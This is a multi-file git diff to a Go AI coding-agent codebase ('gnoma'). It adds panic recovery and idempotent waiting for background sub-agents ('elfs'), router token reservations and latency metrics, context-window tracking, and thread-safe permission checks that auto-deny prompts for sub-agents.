@@ -3,6 +3,7 @@ package elf
import ( import (
"context" "context"
"fmt" "fmt"
"sync"
"sync/atomic" "sync/atomic"
"time" "time"
@@ -80,6 +81,9 @@ type BackgroundElf struct {
cancel context.CancelFunc cancel context.CancelFunc
status atomic.Int32 status atomic.Int32
startAt time.Time startAt time.Time
cachedResult Result
resultOnce sync.Once
eventsClose sync.Once
} }
// SpawnBackground creates and starts a background elf. // SpawnBackground creates and starts a background elf.
@@ -102,6 +106,22 @@ func SpawnBackground(eng *engine.Engine, prompt string) *BackgroundElf {
} }
func (e *BackgroundElf) run(ctx context.Context, prompt string) { func (e *BackgroundElf) run(ctx context.Context, prompt string) {
closeEvents := func() { e.eventsClose.Do(func() { close(e.events) }) }
defer func() {
if r := recover(); r != nil {
closeEvents()
res := Result{
ID: e.id,
Status: StatusFailed,
Error: fmt.Errorf("elf panicked: %v", r),
Duration: time.Since(e.startAt),
}
e.status.Store(int32(StatusFailed))
e.result <- res
}
}()
cb := func(evt stream.Event) { cb := func(evt stream.Event) {
select { select {
case e.events <- evt: case e.events <- evt:
@@ -111,7 +131,7 @@ func (e *BackgroundElf) run(ctx context.Context, prompt string) {
turn, err := e.eng.Submit(ctx, prompt, cb) turn, err := e.eng.Submit(ctx, prompt, cb)
close(e.events) closeEvents()
r := Result{ r := Result{
ID: e.id, ID: e.id,
@@ -149,5 +169,8 @@ func (e *BackgroundElf) Events() <-chan stream.Event { return e.events }
func (e *BackgroundElf) Cancel() { e.cancel() } func (e *BackgroundElf) Cancel() { e.cancel() }
func (e *BackgroundElf) Wait() Result { func (e *BackgroundElf) Wait() Result {
return <-e.result e.resultOnce.Do(func() {
e.cachedResult = <-e.result
})
return e.cachedResult
} }

View File

@@ -222,6 +222,94 @@ func TestManager_WaitAll(t *testing.T) {
} }
} }
func TestBackgroundElf_WaitIdempotent(t *testing.T) {
mp := &mockProvider{
name: "test",
streams: []stream.Stream{newEventStream("hello")},
}
eng, _ := engine.New(engine.Config{Provider: mp, Tools: tool.NewRegistry()})
elf := SpawnBackground(eng, "do something")
r1 := elf.Wait()
r2 := elf.Wait() // must not deadlock
if r1.Status != r2.Status {
t.Errorf("Wait() returned different statuses: %s vs %s", r1.Status, r2.Status)
}
if r1.Output != r2.Output {
t.Errorf("Wait() returned different outputs: %q vs %q", r1.Output, r2.Output)
}
}
func TestBackgroundElf_PanicRecovery(t *testing.T) {
// A provider that panics on Stream() — simulates an engine crash
panicProvider := &panicOnStreamProvider{}
eng, _ := engine.New(engine.Config{Provider: panicProvider, Tools: tool.NewRegistry()})
elf := SpawnBackground(eng, "do something")
result := elf.Wait() // must not hang
if result.Status != StatusFailed {
t.Errorf("status = %s, want failed", result.Status)
}
if result.Error == nil {
t.Error("error should be non-nil after panic recovery")
}
}
type panicOnStreamProvider struct{}
func (p *panicOnStreamProvider) Name() string { return "panic" }
func (p *panicOnStreamProvider) DefaultModel() string { return "panic" }
func (p *panicOnStreamProvider) Models(_ context.Context) ([]provider.ModelInfo, error) {
return nil, nil
}
func (p *panicOnStreamProvider) Stream(_ context.Context, _ provider.Request) (stream.Stream, error) {
panic("intentional test panic")
}
func TestManager_CleanupRemovesMeta(t *testing.T) {
mp := &mockProvider{
name: "test",
streams: []stream.Stream{newEventStream("result")},
}
rtr := router.New(router.Config{})
rtr.RegisterArm(&router.Arm{
ID: "test/mock", Provider: mp, ModelName: "mock",
Capabilities: provider.Capabilities{ToolUse: true},
})
mgr := NewManager(ManagerConfig{Router: rtr, Tools: tool.NewRegistry()})
e, _ := mgr.Spawn(context.Background(), router.TaskGeneration, "task", "", 30)
e.Wait()
// Before cleanup: elf and meta both present
mgr.mu.RLock()
_, elfExists := mgr.elfs[e.ID()]
_, metaExists := mgr.meta[e.ID()]
mgr.mu.RUnlock()
if !elfExists || !metaExists {
t.Fatal("elf and meta should exist before cleanup")
}
mgr.Cleanup()
// After cleanup: both removed
mgr.mu.RLock()
_, elfExists = mgr.elfs[e.ID()]
_, metaExists = mgr.meta[e.ID()]
mgr.mu.RUnlock()
if elfExists {
t.Error("elf should be removed after cleanup")
}
if metaExists {
t.Error("meta should be removed after cleanup (was leaking)")
}
}
// slowEventStream blocks until context cancelled // slowEventStream blocks until context cancelled
type slowEventStream struct { type slowEventStream struct {
done bool done bool

View File

@@ -7,15 +7,18 @@ import (
"sync" "sync"
"somegit.dev/Owlibou/gnoma/internal/engine" "somegit.dev/Owlibou/gnoma/internal/engine"
"somegit.dev/Owlibou/gnoma/internal/permission"
"somegit.dev/Owlibou/gnoma/internal/provider" "somegit.dev/Owlibou/gnoma/internal/provider"
"somegit.dev/Owlibou/gnoma/internal/router" "somegit.dev/Owlibou/gnoma/internal/router"
"somegit.dev/Owlibou/gnoma/internal/security"
"somegit.dev/Owlibou/gnoma/internal/tool" "somegit.dev/Owlibou/gnoma/internal/tool"
) )
// elfMeta tracks routing metadata for quality feedback. // elfMeta tracks routing metadata and pool reservations for quality feedback.
type elfMeta struct { type elfMeta struct {
armID router.ArmID armID router.ArmID
taskType router.TaskType taskType router.TaskType
decision router.RoutingDecision // holds pool reservations until elf completes
} }
// Manager spawns, tracks, and manages elfs. // Manager spawns, tracks, and manages elfs.
@@ -25,12 +28,16 @@ type Manager struct {
meta map[string]elfMeta // routing metadata per elf ID meta map[string]elfMeta // routing metadata per elf ID
router *router.Router router *router.Router
tools *tool.Registry tools *tool.Registry
permissions *permission.Checker
firewall *security.Firewall
logger *slog.Logger logger *slog.Logger
} }
type ManagerConfig struct { type ManagerConfig struct {
Router *router.Router Router *router.Router
Tools *tool.Registry Tools *tool.Registry
Permissions *permission.Checker // nil = allow all (unsafe; prefer passing parent checker)
Firewall *security.Firewall // nil = no scanning
Logger *slog.Logger Logger *slog.Logger
} }
@@ -44,6 +51,8 @@ func NewManager(cfg ManagerConfig) *Manager {
meta: make(map[string]elfMeta), meta: make(map[string]elfMeta),
router: cfg.Router, router: cfg.Router,
tools: cfg.Tools, tools: cfg.Tools,
permissions: cfg.Permissions,
firewall: cfg.Firewall,
logger: logger, logger: logger,
} }
} }
@@ -71,16 +80,26 @@ func (m *Manager) Spawn(ctx context.Context, taskType router.TaskType, prompt, s
"model", arm.ModelName, "model", arm.ModelName,
) )
// Resolve permissions for this elf: inherit parent mode but never prompt
// (no TUI in elf context — prompting would deadlock).
elfPerms := m.permissions
if elfPerms != nil {
elfPerms = elfPerms.WithDenyPrompt()
}
// Create independent engine for the elf // Create independent engine for the elf
eng, err := engine.New(engine.Config{ eng, err := engine.New(engine.Config{
Provider: arm.Provider, Provider: arm.Provider,
Tools: m.tools, Tools: m.tools,
Permissions: elfPerms,
Firewall: m.firewall,
System: systemPrompt, System: systemPrompt,
Model: arm.ModelName, Model: arm.ModelName,
MaxTurns: maxTurns, MaxTurns: maxTurns,
Logger: m.logger, Logger: m.logger,
}) })
if err != nil { if err != nil {
decision.Rollback()
return nil, fmt.Errorf("create elf engine: %w", err) return nil, fmt.Errorf("create elf engine: %w", err)
} }
@@ -88,14 +107,14 @@ func (m *Manager) Spawn(ctx context.Context, taskType router.TaskType, prompt, s
m.mu.Lock() m.mu.Lock()
m.elfs[elf.ID()] = elf m.elfs[elf.ID()] = elf
m.meta[elf.ID()] = elfMeta{armID: arm.ID, taskType: taskType} m.meta[elf.ID()] = elfMeta{armID: arm.ID, taskType: taskType, decision: decision}
m.mu.Unlock() m.mu.Unlock()
m.logger.Info("elf spawned", "id", elf.ID(), "arm", arm.ID) m.logger.Info("elf spawned", "id", elf.ID(), "arm", arm.ID)
return elf, nil return elf, nil
} }
// ReportResult reports an elf's outcome to the router for quality feedback. // ReportResult commits pool reservations and reports an elf's outcome to the router.
func (m *Manager) ReportResult(result Result) { func (m *Manager) ReportResult(result Result) {
m.mu.RLock() m.mu.RLock()
meta, ok := m.meta[result.ID] meta, ok := m.meta[result.ID]
@@ -105,6 +124,11 @@ func (m *Manager) ReportResult(result Result) {
return return
} }
// Commit pool reservations with actual token consumption.
// Cancelled/failed elfs still commit what they consumed; a zero commit is
// safe — it just moves reserved tokens to used at rate 0.
meta.decision.Commit(int(result.Usage.TotalTokens()))
m.router.ReportOutcome(router.Outcome{ m.router.ReportOutcome(router.Outcome{
ArmID: meta.armID, ArmID: meta.armID,
TaskType: meta.taskType, TaskType: meta.taskType,
@@ -116,9 +140,15 @@ func (m *Manager) ReportResult(result Result) {
// SpawnWithProvider creates an elf using a specific provider (bypasses router). // SpawnWithProvider creates an elf using a specific provider (bypasses router).
func (m *Manager) SpawnWithProvider(prov provider.Provider, model, prompt, systemPrompt string, maxTurns int) (Elf, error) { func (m *Manager) SpawnWithProvider(prov provider.Provider, model, prompt, systemPrompt string, maxTurns int) (Elf, error) {
elfPerms := m.permissions
if elfPerms != nil {
elfPerms = elfPerms.WithDenyPrompt()
}
eng, err := engine.New(engine.Config{ eng, err := engine.New(engine.Config{
Provider: prov, Provider: prov,
Tools: m.tools, Tools: m.tools,
Permissions: elfPerms,
Firewall: m.firewall,
System: systemPrompt, System: systemPrompt,
Model: model, Model: model,
MaxTurns: maxTurns, MaxTurns: maxTurns,
@@ -207,6 +237,7 @@ func (m *Manager) Cleanup() {
s := e.Status() s := e.Status()
if s == StatusCompleted || s == StatusFailed || s == StatusCancelled { if s == StatusCompleted || s == StatusFailed || s == StatusCancelled {
delete(m.elfs, id) delete(m.elfs, id)
delete(m.meta, id)
} }
} }
} }

View File

@@ -45,6 +45,11 @@ type Turn struct {
Rounds int // number of API round-trips Rounds int // number of API round-trips
} }
// TurnOptions carries per-turn overrides that apply for a single Submit call.
type TurnOptions struct {
ToolChoice provider.ToolChoiceMode // "" = use provider default
}
// Engine orchestrates the conversation. // Engine orchestrates the conversation.
type Engine struct { type Engine struct {
cfg Config cfg Config
@@ -59,6 +64,9 @@ type Engine struct {
// Deferred tool loading: tools with ShouldDefer() are excluded until // Deferred tool loading: tools with ShouldDefer() are excluded until
// the model requests them. Activated on first use. // the model requests them. Activated on first use.
activatedTools map[string]bool activatedTools map[string]bool
// Per-turn options, set for the duration of SubmitWithOptions.
turnOpts TurnOptions
} }
// New creates an engine. // New creates an engine.
@@ -124,6 +132,9 @@ func (e *Engine) ContextWindow() *gnomactx.Window {
// the model should see as context in subsequent turns. // the model should see as context in subsequent turns.
func (e *Engine) InjectMessage(msg message.Message) { func (e *Engine) InjectMessage(msg message.Message) {
e.history = append(e.history, msg) e.history = append(e.history, msg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(msg)
}
} }
// Usage returns cumulative token usage. // Usage returns cumulative token usage.
@@ -145,4 +156,8 @@ func (e *Engine) SetModel(model string) {
func (e *Engine) Reset() { func (e *Engine) Reset() {
e.history = nil e.history = nil
e.usage = message.Usage{} e.usage = message.Usage{}
if e.cfg.Context != nil {
e.cfg.Context.Reset()
}
e.activatedTools = make(map[string]bool)
} }

View File

@@ -7,6 +7,7 @@ import (
"fmt" "fmt"
"testing" "testing"
gnomactx "somegit.dev/Owlibou/gnoma/internal/context"
"somegit.dev/Owlibou/gnoma/internal/message" "somegit.dev/Owlibou/gnoma/internal/message"
"somegit.dev/Owlibou/gnoma/internal/provider" "somegit.dev/Owlibou/gnoma/internal/provider"
"somegit.dev/Owlibou/gnoma/internal/stream" "somegit.dev/Owlibou/gnoma/internal/stream"
@@ -446,6 +447,109 @@ func TestEngine_Reset(t *testing.T) {
} }
} }
func TestEngine_Reset_ClearsContextWindow(t *testing.T) {
ctxWindow := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
mp := &mockProvider{
name: "test",
streams: []stream.Stream{
newEventStream(message.StopEndTurn, "",
stream.Event{Type: stream.EventTextDelta, Text: "hi"},
),
},
}
e, _ := New(Config{
Provider: mp,
Tools: tool.NewRegistry(),
Context: ctxWindow,
})
e.Submit(context.Background(), "hello", nil)
if len(ctxWindow.Messages()) == 0 {
t.Fatal("context window should have messages before reset")
}
e.Reset()
if len(ctxWindow.Messages()) != 0 {
t.Errorf("context window should be empty after reset, got %d messages", len(ctxWindow.Messages()))
}
}
func TestSubmit_ContextWindowTracksUserAndToolMessages(t *testing.T) {
reg := tool.NewRegistry()
reg.Register(&mockTool{
name: "bash",
execFn: func(_ context.Context, _ json.RawMessage) (tool.Result, error) {
return tool.Result{Output: "output"}, nil
},
})
mp := &mockProvider{
name: "test",
streams: []stream.Stream{
newEventStream(message.StopToolUse, "model",
stream.Event{Type: stream.EventToolCallStart, ToolCallID: "tc1", ToolCallName: "bash"},
stream.Event{Type: stream.EventToolCallDone, ToolCallID: "tc1", Args: json.RawMessage(`{"command":"ls"}`)},
stream.Event{Type: stream.EventUsage, Usage: &message.Usage{InputTokens: 100, OutputTokens: 20}},
),
newEventStream(message.StopEndTurn, "model",
stream.Event{Type: stream.EventTextDelta, Text: "Done."},
),
},
}
ctxWindow := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
e, _ := New(Config{
Provider: mp,
Tools: reg,
Context: ctxWindow,
})
_, err := e.Submit(context.Background(), "list files", nil)
if err != nil {
t.Fatalf("Submit: %v", err)
}
allMsgs := ctxWindow.AllMessages()
// Expect: user msg, assistant (tool call), tool results, assistant (final)
if len(allMsgs) < 4 {
t.Errorf("context window has %d messages, want at least 4 (user+assistant+tool_results+assistant)", len(allMsgs))
for i, m := range allMsgs {
t.Logf(" [%d] role=%s content=%s", i, m.Role, m.TextContent())
}
}
// First message should be user
if len(allMsgs) > 0 && allMsgs[0].Role != message.RoleUser {
t.Errorf("allMsgs[0].Role = %q, want user", allMsgs[0].Role)
}
}
func TestSubmit_TrackerReflectsInputTokens(t *testing.T) {
// Verify the tracker is set from InputTokens (not accumulated).
// After 3 rounds, tracker should equal last round's InputTokens+OutputTokens,
// not the sum of all rounds.
ctxWindow := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
mp := &mockProvider{
name: "test",
streams: []stream.Stream{
newEventStream(message.StopEndTurn, "",
stream.Event{Type: stream.EventUsage, Usage: &message.Usage{InputTokens: 100, OutputTokens: 50}},
stream.Event{Type: stream.EventTextDelta, Text: "a"},
),
},
}
e, _ := New(Config{Provider: mp, Tools: tool.NewRegistry(), Context: ctxWindow})
e.Submit(context.Background(), "hi", nil)
// Tracker should be InputTokens + OutputTokens = 150, not more
used := ctxWindow.Tracker().Used()
if used != 150 {
t.Errorf("tracker = %d, want 150 (InputTokens+OutputTokens, not cumulative)", used)
}
}
func TestSubmit_CumulativeUsage(t *testing.T) { func TestSubmit_CumulativeUsage(t *testing.T) {
mp := &mockProvider{ mp := &mockProvider{
name: "test", name: "test",

View File

@@ -2,7 +2,6 @@ package engine
import ( import (
"context" "context"
"encoding/json"
"errors" "errors"
"fmt" "fmt"
"sync" "sync"
@@ -20,8 +19,19 @@ import (
// Submit sends a user message and runs the agentic loop to completion. // Submit sends a user message and runs the agentic loop to completion.
// The callback receives real-time streaming events. // The callback receives real-time streaming events.
func (e *Engine) Submit(ctx context.Context, input string, cb Callback) (*Turn, error) { func (e *Engine) Submit(ctx context.Context, input string, cb Callback) (*Turn, error) {
return e.SubmitWithOptions(ctx, input, TurnOptions{}, cb)
}
// SubmitWithOptions is like Submit but applies per-turn overrides (e.g. ToolChoice).
func (e *Engine) SubmitWithOptions(ctx context.Context, input string, opts TurnOptions, cb Callback) (*Turn, error) {
e.turnOpts = opts
defer func() { e.turnOpts = TurnOptions{} }()
userMsg := message.NewUserText(input) userMsg := message.NewUserText(input)
e.history = append(e.history, userMsg) e.history = append(e.history, userMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(userMsg)
}
return e.runLoop(ctx, cb) return e.runLoop(ctx, cb)
} }
@@ -29,6 +39,11 @@ func (e *Engine) Submit(ctx context.Context, input string, cb Callback) (*Turn,
// SubmitMessages is like Submit but accepts pre-built messages. // SubmitMessages is like Submit but accepts pre-built messages.
func (e *Engine) SubmitMessages(ctx context.Context, msgs []message.Message, cb Callback) (*Turn, error) { func (e *Engine) SubmitMessages(ctx context.Context, msgs []message.Message, cb Callback) (*Turn, error) {
e.history = append(e.history, msgs...) e.history = append(e.history, msgs...)
if e.cfg.Context != nil {
for _, m := range msgs {
e.cfg.Context.AppendMessage(m)
}
}
return e.runLoop(ctx, cb) return e.runLoop(ctx, cb)
} }
@@ -48,6 +63,7 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Route and stream // Route and stream
var s stream.Stream var s stream.Stream
var err error var err error
var decision router.RoutingDecision
if e.cfg.Router != nil { if e.cfg.Router != nil {
// Classify task from the latest user message // Classify task from the latest user message
@@ -59,7 +75,7 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
} }
} }
task := router.ClassifyTask(prompt) task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000 // rough default task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
e.logger.Debug("routing request", e.logger.Debug("routing request",
"task_type", task.Type, "task_type", task.Type,
@@ -67,13 +83,12 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
"round", turn.Rounds, "round", turn.Rounds,
) )
var arm *router.Arm s, decision, err = e.cfg.Router.Stream(ctx, task, req)
s, arm, err = e.cfg.Router.Stream(ctx, task, req) if decision.Arm != nil {
if arm != nil {
e.logger.Debug("streaming request", e.logger.Debug("streaming request",
"provider", arm.Provider.Name(), "provider", decision.Arm.Provider.Name(),
"model", arm.ModelName, "model", decision.Arm.ModelName,
"arm", arm.ID, "arm", decision.Arm.ID,
"messages", len(req.Messages), "messages", len(req.Messages),
"tools", len(req.Tools), "tools", len(req.Tools),
"round", turn.Rounds, "round", turn.Rounds,
@@ -101,9 +116,11 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
} }
} }
task := router.ClassifyTask(prompt) task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000 task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
s, _, retryErr := e.cfg.Router.Stream(ctx, task, req) var retryDecision router.RoutingDecision
return s, retryErr s, retryDecision, err = e.cfg.Router.Stream(ctx, task, req)
decision = retryDecision // adopt new reservation on retry
return s, err
} }
return e.cfg.Provider.Stream(ctx, req) return e.cfg.Provider.Stream(ctx, req)
}) })
@@ -111,20 +128,30 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Try reactive compaction on 413 (request too large) // Try reactive compaction on 413 (request too large)
s, err = e.handleRequestTooLarge(ctx, err, req) s, err = e.handleRequestTooLarge(ctx, err, req)
if err != nil { if err != nil {
decision.Rollback()
return nil, fmt.Errorf("provider stream: %w", err) return nil, fmt.Errorf("provider stream: %w", err)
} }
} }
} }
// Consume stream, forwarding events to callback // Consume stream, forwarding events to callback.
// Track TTFT and stream duration for arm performance metrics.
acc := stream.NewAccumulator() acc := stream.NewAccumulator()
var stopReason message.StopReason var stopReason message.StopReason
var model string var model string
streamStart := time.Now()
var firstTokenAt time.Time
for s.Next() { for s.Next() {
evt := s.Current() evt := s.Current()
acc.Apply(evt) acc.Apply(evt)
// Record time of first text token for TTFT metric
if firstTokenAt.IsZero() && evt.Type == stream.EventTextDelta && evt.Text != "" {
firstTokenAt = time.Now()
}
// Capture stop reason and model from events // Capture stop reason and model from events
if evt.StopReason != "" { if evt.StopReason != "" {
stopReason = evt.StopReason stopReason = evt.StopReason
@@ -137,14 +164,28 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
cb(evt) cb(evt)
} }
} }
streamEnd := time.Now()
if err := s.Err(); err != nil { if err := s.Err(); err != nil {
s.Close() s.Close()
decision.Rollback()
return nil, fmt.Errorf("stream error: %w", err) return nil, fmt.Errorf("stream error: %w", err)
} }
s.Close() s.Close()
// Build response // Build response
resp := acc.Response(stopReason, model) resp := acc.Response(stopReason, model)
// Commit pool reservation and record perf metrics for this round.
actualTokens := int(resp.Usage.InputTokens + resp.Usage.OutputTokens)
decision.Commit(actualTokens)
if decision.Arm != nil && !firstTokenAt.IsZero() {
decision.Arm.Perf.Update(
firstTokenAt.Sub(streamStart),
int(resp.Usage.OutputTokens),
streamEnd.Sub(streamStart),
)
}
turn.Usage.Add(resp.Usage) turn.Usage.Add(resp.Usage)
turn.Messages = append(turn.Messages, resp.Message) turn.Messages = append(turn.Messages, resp.Message)
e.history = append(e.history, resp.Message) e.history = append(e.history, resp.Message)
@@ -152,7 +193,14 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Track in context window and check for compaction // Track in context window and check for compaction
if e.cfg.Context != nil { if e.cfg.Context != nil {
e.cfg.Context.Append(resp.Message, resp.Usage) e.cfg.Context.AppendMessage(resp.Message)
// Set tracker to the provider-reported context size (InputTokens = full context
// as sent this round). This avoids double-counting InputTokens across rounds.
if resp.Usage.InputTokens > 0 {
e.cfg.Context.Tracker().Set(resp.Usage.InputTokens + resp.Usage.OutputTokens)
} else {
e.cfg.Context.Tracker().Add(message.Usage{OutputTokens: resp.Usage.OutputTokens})
}
if compacted, err := e.cfg.Context.CompactIfNeeded(); err != nil { if compacted, err := e.cfg.Context.CompactIfNeeded(); err != nil {
e.logger.Error("context compaction failed", "error", err) e.logger.Error("context compaction failed", "error", err)
} else if compacted { } else if compacted {
@@ -169,9 +217,19 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Decide next action // Decide next action
switch resp.StopReason { switch resp.StopReason {
case message.StopEndTurn, message.StopMaxTokens, message.StopSequence: case message.StopEndTurn, message.StopSequence:
return turn, nil return turn, nil
case message.StopMaxTokens:
// Model hit its output token budget mid-response. Inject a continue prompt
// and re-query so the response is completed rather than silently truncated.
contMsg := message.NewUserText("Continue from where you left off.")
e.history = append(e.history, contMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(contMsg)
}
// Continue loop — next round will resume generation
case message.StopToolUse: case message.StopToolUse:
results, err := e.executeTools(ctx, resp.Message.ToolCalls(), cb) results, err := e.executeTools(ctx, resp.Message.ToolCalls(), cb)
if err != nil { if err != nil {
@@ -180,6 +238,9 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
toolMsg := message.NewToolResults(results...) toolMsg := message.NewToolResults(results...)
turn.Messages = append(turn.Messages, toolMsg) turn.Messages = append(turn.Messages, toolMsg)
e.history = append(e.history, toolMsg) e.history = append(e.history, toolMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(toolMsg)
}
// Continue loop — re-query provider with tool results // Continue loop — re-query provider with tool results
default: default:
@@ -205,12 +266,15 @@ func (e *Engine) buildRequest(ctx context.Context) provider.Request {
Model: e.cfg.Model, Model: e.cfg.Model,
SystemPrompt: systemPrompt, SystemPrompt: systemPrompt,
Messages: messages, Messages: messages,
ToolChoice: e.turnOpts.ToolChoice,
} }
// Only include tools if the model supports them // Only include tools if the model supports them.
// When Router is active, skip capability gating — the router selects the arm
// and already knows its capabilities. Gating here would use the wrong provider.
caps := e.resolveCapabilities(ctx) caps := e.resolveCapabilities(ctx)
if caps == nil || caps.ToolUse { if e.cfg.Router != nil || caps == nil || caps.ToolUse {
// nil caps = unknown model, include tools optimistically // Router active, nil caps (unknown model), or model supports tools
for _, t := range e.cfg.Tools.All() { for _, t := range e.cfg.Tools.All() {
// Skip deferred tools until the model requests them // Skip deferred tools until the model requests them
if dt, ok := t.(tool.DeferrableTool); ok && dt.ShouldDefer() && !e.activatedTools[t.Name()] { if dt, ok := t.(tool.DeferrableTool); ok && dt.ShouldDefer() && !e.activatedTools[t.Name()] {
@@ -352,10 +416,11 @@ func (e *Engine) executeSingleTool(ctx context.Context, call message.ToolCall, t
} }
func truncate(s string, maxLen int) string { func truncate(s string, maxLen int) string {
if len(s) <= maxLen { runes := []rune(s)
if len(runes) <= maxLen {
return s return s
} }
return s[:maxLen] + "..." return string(runes[:maxLen]) + "..."
} }
// handleRequestTooLarge attempts compaction on 413 and retries once. // handleRequestTooLarge attempts compaction on 413 and retries once.
@@ -387,7 +452,7 @@ func (e *Engine) handleRequestTooLarge(ctx context.Context, origErr error, req p
} }
} }
task := router.ClassifyTask(prompt) task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000 task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
s, _, err := e.cfg.Router.Stream(ctx, task, req) s, _, err := e.cfg.Router.Stream(ctx, task, req)
return s, err return s, err
} }
@@ -441,12 +506,3 @@ func (e *Engine) retryOnTransient(ctx context.Context, firstErr error, fn func()
return nil, firstErr return nil, firstErr
} }
// toolDefFromTool converts a tool.Tool to provider.ToolDefinition.
// Unused currently but kept for reference when building tool definitions dynamically.
func toolDefFromJSON(name, description string, params json.RawMessage) provider.ToolDefinition {
return provider.ToolDefinition{
Name: name,
Description: description,
Parameters: params,
}
}

View File

@@ -6,6 +6,7 @@ import (
"errors" "errors"
"fmt" "fmt"
"strings" "strings"
"sync"
) )
var ErrDenied = errors.New("permission denied") var ErrDenied = errors.New("permission denied")
@@ -31,6 +32,7 @@ type ToolInfo struct {
// 5. Mode-specific behavior // 5. Mode-specific behavior
// 6. Prompt user if needed // 6. Prompt user if needed
type Checker struct { type Checker struct {
mu sync.RWMutex
mode Mode mode Mode
rules []Rule rules []Rule
promptFn PromptFunc promptFn PromptFunc
@@ -53,22 +55,47 @@ func NewChecker(mode Mode, rules []Rule, promptFn PromptFunc) *Checker {
// SetPromptFunc replaces the prompt function (e.g., switching from pipe to TUI prompt). // SetPromptFunc replaces the prompt function (e.g., switching from pipe to TUI prompt).
func (c *Checker) SetPromptFunc(fn PromptFunc) { func (c *Checker) SetPromptFunc(fn PromptFunc) {
c.mu.Lock()
defer c.mu.Unlock()
c.promptFn = fn c.promptFn = fn
} }
// SetMode changes the active permission mode. // SetMode changes the active permission mode.
func (c *Checker) SetMode(mode Mode) { func (c *Checker) SetMode(mode Mode) {
c.mu.Lock()
defer c.mu.Unlock()
c.mode = mode c.mode = mode
} }
// Mode returns the current permission mode. // Mode returns the current permission mode.
func (c *Checker) Mode() Mode { func (c *Checker) Mode() Mode {
c.mu.RLock()
defer c.mu.RUnlock()
return c.mode return c.mode
} }
// WithDenyPrompt returns a new Checker with the same mode and rules but a nil prompt
// function. When a tool would normally require prompting, it is auto-denied. Used for
// elf engines where there is no TUI to prompt.
func (c *Checker) WithDenyPrompt() *Checker {
c.mu.RLock()
defer c.mu.RUnlock()
return &Checker{
mode: c.mode,
rules: c.rules,
promptFn: nil,
safetyDenyPatterns: c.safetyDenyPatterns,
}
}
// Check evaluates whether a tool call is permitted. // Check evaluates whether a tool call is permitted.
// Returns nil if allowed, ErrDenied if denied. // Returns nil if allowed, ErrDenied if denied.
func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage) error { func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage) error {
c.mu.RLock()
mode := c.mode
promptFn := c.promptFn
c.mu.RUnlock()
// Step 1: Rule-based deny gates (bypass-immune) // Step 1: Rule-based deny gates (bypass-immune)
if c.matchesRule(info.Name, args, ActionDeny) { if c.matchesRule(info.Name, args, ActionDeny) {
return fmt.Errorf("%w: deny rule matched for %s", ErrDenied, info.Name) return fmt.Errorf("%w: deny rule matched for %s", ErrDenied, info.Name)
@@ -87,7 +114,7 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
} }
// Step 3: Mode-based bypass // Step 3: Mode-based bypass
if c.mode == ModeBypass { if mode == ModeBypass {
return nil return nil
} }
@@ -97,7 +124,7 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
} }
// Step 5: Mode-specific behavior // Step 5: Mode-specific behavior
switch c.mode { switch mode {
case ModeDeny: case ModeDeny:
return fmt.Errorf("%w: deny mode, no allow rule for %s", ErrDenied, info.Name) return fmt.Errorf("%w: deny mode, no allow rule for %s", ErrDenied, info.Name)
@@ -128,8 +155,24 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
// Always prompt // Always prompt
} }
// Step 6: Prompt user // Step 6: Prompt user (using snapshot of promptFn taken before lock release)
return c.prompt(ctx, info.Name, args) if promptFn == nil {
// No prompt handler (e.g. elf sub-agent): auto-allow non-destructive fs
// operations so elfs can write files in auto/acceptEdits modes. Deny
// everything else that would normally require human approval.
if strings.HasPrefix(info.Name, "fs.") && !info.IsDestructive {
return nil
}
return fmt.Errorf("%w: no prompt handler for %s", ErrDenied, info.Name)
}
approved, err := promptFn(ctx, info.Name, args)
if err != nil {
return fmt.Errorf("permission prompt: %w", err)
}
if !approved {
return fmt.Errorf("%w: user denied %s", ErrDenied, info.Name)
}
return nil
} }
func (c *Checker) matchesRule(toolName string, args json.RawMessage, action Action) bool { func (c *Checker) matchesRule(toolName string, args json.RawMessage, action Action) bool {
@@ -152,9 +195,26 @@ func (c *Checker) matchesRule(toolName string, args json.RawMessage, action Acti
} }
func (c *Checker) safetyCheck(toolName string, args json.RawMessage) error { func (c *Checker) safetyCheck(toolName string, args json.RawMessage) error {
argsStr := string(args) // Orchestration tools (spawn_elfs, agent) carry elf PROMPTS as args — arbitrary
// instruction text that may legitimately mention .env, credentials, etc.
// Security is enforced inside each spawned elf when it actually accesses files.
if toolName == "spawn_elfs" || toolName == "agent" {
return nil
}
// For fs.* tools, only check the path field — not content being written.
// Prevents false-positives when writing docs that reference .env, .ssh, etc.
checkStr := string(args)
if strings.HasPrefix(toolName, "fs.") {
var parsed struct {
Path string `json:"path"`
}
if err := json.Unmarshal(args, &parsed); err == nil && parsed.Path != "" {
checkStr = parsed.Path
}
}
for _, pattern := range c.safetyDenyPatterns { for _, pattern := range c.safetyDenyPatterns {
if strings.Contains(argsStr, pattern) { if strings.Contains(checkStr, pattern) {
